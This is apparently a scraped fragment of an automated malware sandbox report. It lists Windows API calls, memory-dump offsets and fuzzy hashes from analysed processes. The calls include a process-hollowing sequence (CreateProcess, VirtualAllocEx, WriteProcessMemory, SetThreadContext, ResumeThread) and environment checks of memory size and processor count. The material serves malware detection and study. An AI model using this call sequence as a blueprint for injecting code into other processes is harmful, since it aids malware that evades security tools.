• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0914E8AE
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02E2A056
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

APIs
• CreateActCtxA.KERNEL32(?), ref: 02E25519
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0914E480
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 0914E2D6
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0914E560
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2C3BF
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E2A0D1,00000800,00000000,00000000), ref: 02E2A2E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E2A0D1,00000800,00000000,00000000), ref: 02E2A2E2
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0914E39E
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02E2A056
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 09221875
Memory Dump Source
• Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 09221875
Memory Dump Source
• Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID:
• String ID: MIIa
• API String ID: 0-1181251807
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Executed Functions

Memory Dump Source
• Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 017E6BB0
• GetCurrentThread.KERNEL32 ref: 017E6BED
• GetCurrentProcess.KERNEL32 ref: 017E6C2A
• GetCurrentThreadId.KERNEL32 ref: 017E6C83
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
                                                                                                  • Opcode ID: d79e00a3888a4ec31043b051caa40282fd2a71e5406f5da9d77d4e44aa9cd301
                                                                                                  • Instruction ID: a3468c37e2b1d5ec0832e55d62595130147d98a4390d1baedc9c58e82d1f52dd
                                                                                                  • Opcode Fuzzy Hash: d79e00a3888a4ec31043b051caa40282fd2a71e5406f5da9d77d4e44aa9cd301
                                                                                                  • Instruction Fuzzy Hash: 7D5187B09047888FDB10CFA9C548BDEBFF0EF59314F2484AAE448A7261D7B46844CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6BB0
                                                                                                  • GetCurrentThread.KERNEL32 ref: 017E6BED
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 017E6C2A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 017E6C83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 0b097dc068087f14a86b3be6b73659f9dd6875423cac56deb79415f6c93b1504
                                                                                                  • Instruction ID: edd637224cc94c6bd4c190a280aeb360ec300c258ffb2cc63d8b00beefc1a235
                                                                                                  • Opcode Fuzzy Hash: 0b097dc068087f14a86b3be6b73659f9dd6875423cac56deb79415f6c93b1504
                                                                                                  • Instruction Fuzzy Hash: 225133B09107488FDB54CFA9D548BDEFBF5EFA8314F208469E419A7360DB746884CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f56270de7a0f0b0c7dfde8a9b225f42dd07ca80b8bf0f291818d583ce4f85d41
                                                                                                  • Instruction ID: b5217a3047c36cf824df19aacd355aa01e0299864389b58a8a4146b0950a4ecd
                                                                                                  • Opcode Fuzzy Hash: f56270de7a0f0b0c7dfde8a9b225f42dd07ca80b8bf0f291818d583ce4f85d41
                                                                                                  • Instruction Fuzzy Hash: 4F52C630B093418FDB029BB8981D7697BF6AF86314F1584B6E545CB3A6EB78CC09C761
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 6ecd104761baaa029f38ac53dfceb173b11646526c667a7bdb2e4504d196ad8e
                                                                                                  • Instruction ID: 9a0ecd777d025cd87a34b010a590b360a4aa8e3537ad01d4448385f1c3113289
                                                                                                  • Opcode Fuzzy Hash: 6ecd104761baaa029f38ac53dfceb173b11646526c667a7bdb2e4504d196ad8e
                                                                                                  • Instruction Fuzzy Hash: 41B17770A007058FDB04EF79C48866EFBF6FF98214B10896ED80ADB765DB74E8058B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6cb24cc78fe49a0ec11a430293a68f5e00a009955dd56f0923276ec6a8535b68
                                                                                                  • Instruction ID: 1672489f124d6d95f0657b8275c523afc42f0fc02e34625e334347d39757c993
                                                                                                  • Opcode Fuzzy Hash: 6cb24cc78fe49a0ec11a430293a68f5e00a009955dd56f0923276ec6a8535b68
                                                                                                  • Instruction Fuzzy Hash: 656122B5C0424DAFDF12CFA9D888ACDBFF5AF49318F24815AE808AB221D7719845CF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7997eb014bbefd9bb601ae423d09a352804f2abf33cf13dfa1572dfe9984ea8c
                                                                                                  • Instruction ID: b2dfbe29be4301c13304da8a296241e8aa2eecb5bab1d265299953aa2bc42ec7
                                                                                                  • Opcode Fuzzy Hash: 7997eb014bbefd9bb601ae423d09a352804f2abf33cf13dfa1572dfe9984ea8c
                                                                                                  • Instruction Fuzzy Hash: FB517571B002059FCB14EFB4D848AEEFBF6BF94248B148969D5069B355EF30D805CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0b213e397662c06639aabc7c48d9f983fd70c1bf164ca58c5e095e9966446958
                                                                                                  • Instruction ID: a338fe9e8b3942fd128f512e133668b6ede43351b5871efd67746256e0b3eba8
                                                                                                  • Opcode Fuzzy Hash: 0b213e397662c06639aabc7c48d9f983fd70c1bf164ca58c5e095e9966446958
                                                                                                  • Instruction Fuzzy Hash: 9D51A671B003059FCB14EFB4D848AEDBBF5BF94208B14896AD4129B3A5EF30D805CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c8a53edb07896a9be9b7d42af9da3011923a2f0219914c4bc4318829ee839e9
                                                                                                  • Instruction ID: 7d1773e630317fd036db5cdf3e8d7d8305cf686ee4670ddb30303f08a1b5a89e
                                                                                                  • Opcode Fuzzy Hash: 5c8a53edb07896a9be9b7d42af9da3011923a2f0219914c4bc4318829ee839e9
                                                                                                  • Instruction Fuzzy Hash: 24412172E047568FCB04CFB9C8042DEBBF5EF99214F1889AAC409A7251DB789885CBD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017E52A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: c86df8f69ec8c3735cb0439415e83e046c3a007e785c739603479d4fa4b79a98
                                                                                                  • Instruction ID: 576ba06d8a11a8e88c74b801322a3963c50e74761d71845742e47ed487188e02
                                                                                                  • Opcode Fuzzy Hash: c86df8f69ec8c3735cb0439415e83e046c3a007e785c739603479d4fa4b79a98
                                                                                                  • Instruction Fuzzy Hash: 2151D0B1C103089FDB14CF99D884ADEFBF5BF58314F64812AE818AB210D7749845CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017E52A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: b277345ba780958366f7f388a2efeb1f89b08782aa5e3af79ef1a010e85fae8d
                                                                                                  • Instruction ID: 1f46b21dd9076d69869331938785f84d4b0341d7205c125b5f0701d558c300e9
                                                                                                  • Opcode Fuzzy Hash: b277345ba780958366f7f388a2efeb1f89b08782aa5e3af79ef1a010e85fae8d
                                                                                                  • Instruction Fuzzy Hash: DB41CEB1D103089FDB14CF9AC884ADEFBF5BF58314F64812AE818AB210D774A885CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0176CA0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: 7e764db84bae9aad7dc0a9703837cb870062310874243d3c78017ae5f784c660
                                                                                                  • Instruction ID: 63dea82d04359056bb1a2adbb69c0fc29cec6fd5015fbbf8f821f8324f4cf043
                                                                                                  • Opcode Fuzzy Hash: 7e764db84bae9aad7dc0a9703837cb870062310874243d3c78017ae5f784c660
                                                                                                  • Instruction Fuzzy Hash: 774128B0E003498FDB15CF98C548B9EFBF9AF48304F24C56AD848AB345D7759945CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 017E7CF9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 82f92a82907c25d710c157873441084d52ba74178fe6af57c6d05c0dc9546b31
                                                                                                  • Instruction ID: f350131921f4b4022ea84a46514ee4b04921e89a2a227ca4af49dafe9e46a0cd
                                                                                                  • Opcode Fuzzy Hash: 82f92a82907c25d710c157873441084d52ba74178fe6af57c6d05c0dc9546b31
                                                                                                  • Instruction Fuzzy Hash: 45414AB59003458FCB14CF99C488AAAFBF9FF9C324F248458D419A7321D774A841CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0176CC79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: 3907d767ae4d707745a6714e49572d5d928139d1cd82e742baea986396dfba3f
                                                                                                  • Instruction ID: 2c60e58f441185a13547377cbdf740d815b5754ab98e23c145bfa6aa2c2df21c
                                                                                                  • Opcode Fuzzy Hash: 3907d767ae4d707745a6714e49572d5d928139d1cd82e742baea986396dfba3f
                                                                                                  • Instruction Fuzzy Hash: 7D31FDB1D006589FCB10CF9AD984ACEFBF9BF48314F54842AE859AB314D7749949CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0176CC79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3660427363-0
                                                                                                  • Opcode ID: 15416d887718022036a2a71e4dad51d1186480bf54b295b28bf4348ddb9a5633
                                                                                                  • Instruction ID: fe57c80665a0114a4f0880049336485c68394fc04aee8378d70ae36488b70f82
                                                                                                  • Opcode Fuzzy Hash: 15416d887718022036a2a71e4dad51d1186480bf54b295b28bf4348ddb9a5633
                                                                                                  • Instruction Fuzzy Hash: 6631EDB1D002589FCB10CF9AD984ADEFBF9BF48314F54842AE859AB314D774A905CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0176CA0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.524308625.0000000001760000.00000040.00000010.sdmp, Offset: 01760000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: fc1c75ad13171c305a9ec2b796095a2640244e21d35c1e7cd18932043f957a57
                                                                                                  • Instruction ID: 620b2c5de34b619bf1d755638700992bad4e91a1ef8ac9947d147d0735c964be
                                                                                                  • Opcode Fuzzy Hash: fc1c75ad13171c305a9ec2b796095a2640244e21d35c1e7cd18932043f957a57
                                                                                                  • Instruction Fuzzy Hash: D731F2B0D003499FDB14CF99C584A8EFBF9BF48304F68856AE909AB344C7B59949CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017E6DFF
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 9ba5629515e68bbb08124f32bfc0ee4fdd4b30820b15537b91e51318764e707b
• Instruction ID: a5e7a8236cab9b93ad8e6359e8f1acb931deafb61dfdf5936d9db240928c2607
• Opcode Fuzzy Hash: 9ba5629515e68bbb08124f32bfc0ee4fdd4b30820b15537b91e51318764e707b
• Instruction Fuzzy Hash: EB21E3B5900218AFDB10CFA9D488ADEFBF8FB58324F54842AE914A7350D374A954CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017E6DFF
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: e8b10d8dad5ab060ef112577f7c2321f8871e2a7421c7dc9ed2c1583c6551da3
• Instruction ID: 95a59041513ff13d8ced441979a14937beda1ad218ac5e8769240717452685d0
• Opcode Fuzzy Hash: e8b10d8dad5ab060ef112577f7c2321f8871e2a7421c7dc9ed2c1583c6551da3
• Instruction Fuzzy Hash: 6621F5B59002189FDB10CFA9D484ADEFBF8FB58324F14841AE914A7350D374A954CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: d4c4d9883df5e7942f5cb31f0c107bf28c77a703fe1d0f965fcf4cd30cd61bb6
• Instruction ID: 6dfb9365d144fc6f7142e173f4414f818831e98616b9584b1bebc7d802c3de7d
• Opcode Fuzzy Hash: d4c4d9883df5e7942f5cb31f0c107bf28c77a703fe1d0f965fcf4cd30cd61bb6
• Instruction Fuzzy Hash: CB2136B1D046488FCB10CFAAD448ADEFBF8EF59224F14886AD456B7201C374A549CFA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 017EC432
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: b20956016a3b60c63c9b9c2b390acb6b4b58159215c51271a07c64e26f7f3300
• Instruction ID: 11ecc034d72153e855ebaf6253f28571ceeaeefca8df57c75a39a68fe03f8ee8
• Opcode Fuzzy Hash: b20956016a3b60c63c9b9c2b390acb6b4b58159215c51271a07c64e26f7f3300
• Instruction Fuzzy Hash: 4D218CB59013488FDB21DFA9D4097EEBFF8EB49318F64842AD848B7200C7796544CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 98cbfa4ea084b0ddb639dbec1efbe05db9ad364cb59c884570c44a40238bbf25
• Instruction ID: e5dd08679ec6026d65528c068eb6e5d466b0446e9d1f63247eec16de2aa30872
• Opcode Fuzzy Hash: 98cbfa4ea084b0ddb639dbec1efbe05db9ad364cb59c884570c44a40238bbf25
• Instruction Fuzzy Hash: 4B210870E11319DFCB15DFA8D588BAEBBB2FB84309F118929D401A7354CB76A889CF50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 017EC432
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: e16c42e2241d07347ab9077ffeabf6c5cf824c2bfbdd5b48457fe414d00ce0b4
• Instruction ID: eb46302c8a255c447d39a5f413ecfd153772dbf22694d33c7eb78c7d2873dec8
• Opcode Fuzzy Hash: e16c42e2241d07347ab9077ffeabf6c5cf824c2bfbdd5b48457fe414d00ce0b4
• Instruction Fuzzy Hash: EF119AB59013088FDB21DFA9D4097AEBFF8EB49318F64842AD408B7600C7796984CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 0139DEC7
Memory Dump Source
• Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 0753bb8a03e89d1e2d03240b758e9543f330b8ea8e8e34fc5d91ebaeb8f9de82
• Instruction ID: 2e8f0af336b3955f38850daaea6f9497b5d3df122f5ae147bacceeb358179146
• Opcode Fuzzy Hash: 0753bb8a03e89d1e2d03240b758e9543f330b8ea8e8e34fc5d91ebaeb8f9de82
• Instruction Fuzzy Hash: EA1106B1C006599FCB00CF9AD444BDEBBB4EF48224F14856AD818B7240D378A949CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 51ab8b1d2a0d4a1e4e4281164c1f5dcb9e78885673c09053da9074a458a5b425
• Instruction ID: 0a8e388fce697ae9ba3ded956c38713077e0467472dbf1b0e91331fb2d8f627c
• Opcode Fuzzy Hash: 51ab8b1d2a0d4a1e4e4281164c1f5dcb9e78885673c09053da9074a458a5b425
• Instruction Fuzzy Hash: C711F0B1D006498BDB10CF9AD448BDEFBF8EB99224F54846AD929B7200C374A545CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 017E4216
Memory Dump Source
• Source File: 00000003.00000002.524507799.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 3128734693cb7846983d2f7d8b4a932edabf7698ce93039ad0b35e479b4ce703
• Instruction ID: a3d1d1475c83e69bb412257a3f1732f95bd63944de337f62717a0c95c7db475d
• Opcode Fuzzy Hash: 3128734693cb7846983d2f7d8b4a932edabf7698ce93039ad0b35e479b4ce703
• Instruction Fuzzy Hash: DE1102B1C006498FDB10CF9AD848BDEFBF8EF88224F14842AD829B7200C374A545CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetActiveProcessorCount.KERNEL32(00000000), ref: 0139D4CD
Memory Dump Source
• Source File: 00000003.00000002.521417844.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID: ActiveCountProcessor
• String ID:
• API String ID: 2731003492-0
• Opcode ID: c4952809ddaafbfeeee37f1d0961d88577dc6daf5444b693e2f6b50b97658986
• Instruction ID: 3a39df9b3e7391f7c65fa07106aaec3d278cdcfb68116b67c99d6287df917e9b
• Opcode Fuzzy Hash: c4952809ddaafbfeeee37f1d0961d88577dc6daf5444b693e2f6b50b97658986
• Instruction Fuzzy Hash: 8FF0A771F001159F8B50ABB9940869F7AF9EF982A9B100576D50AD3314EF34CE0187E1
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions